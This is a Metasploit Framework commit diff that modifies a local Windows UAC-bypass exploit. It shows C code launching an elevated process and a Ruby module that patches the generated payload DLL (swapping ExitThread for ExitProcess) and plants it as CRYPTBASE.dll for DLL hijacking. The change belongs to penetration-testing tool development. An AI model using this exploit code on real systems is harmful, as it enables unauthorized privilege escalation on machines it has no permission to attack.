Use ExitProcess

bug/bundler_fix
Meatballs 2013-12-05 17:08:47 +00:00
parent cf12826d2c
commit dc0f2b7291
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
4 changed files with 8 additions and 7 deletions

Binary file not shown.

Binary file not shown.

View File

@ -85,8 +85,6 @@ void exploit()
Wow64DisableWow64FsRedirection(&OldValue); Wow64DisableWow64FsRedirection(&OldValue);
if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL) if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
{ {
WaitForSingleObject(shinfo.hProcess, 200);
TerminateProcess(shinfo.hProcess, 0); // Even better if the template payload.dll calls ExitProcess
CloseHandle(shinfo.hProcess); CloseHandle(shinfo.hProcess);
} }
Wow64RevertWow64FsRedirection(OldValue); Wow64RevertWow64FsRedirection(OldValue);

View File

@ -1,8 +1,6 @@
## ##
# This file is part of the Metasploit Framework and may be subject to # This module requires Metasploit: http//metasploit.com/download
# redistribution and commercial restrictions. Please see the Metasploit # Current source: https://github.com/rapid7/metasploit-framework
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
## ##
require 'msf/core' require 'msf/core'
@ -64,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Local
def exploit def exploit
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system? #fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
# #
# Verify use against Vista+ # Verify use against Vista+
@ -154,6 +152,11 @@ class Metasploit3 < Msf::Exploit::Local
# Generate payload and random names for upload # Generate payload and random names for upload
# #
payload = generate_payload_dll payload = generate_payload_dll
# Change ExitThread to ExitProcess ...
exit_thread = "\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\x00"
exit_process = "\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73"
index = payload.index(exit_thread)
payload[index,exit_process.length] = exit_process
payload_filepath = "#{tmpdir}\\CRYPTBASE.dll" payload_filepath = "#{tmpdir}\\CRYPTBASE.dll"
print_status("Uploading the Payload DLL to the filesystem...") print_status("Uploading the Payload DLL to the filesystem...")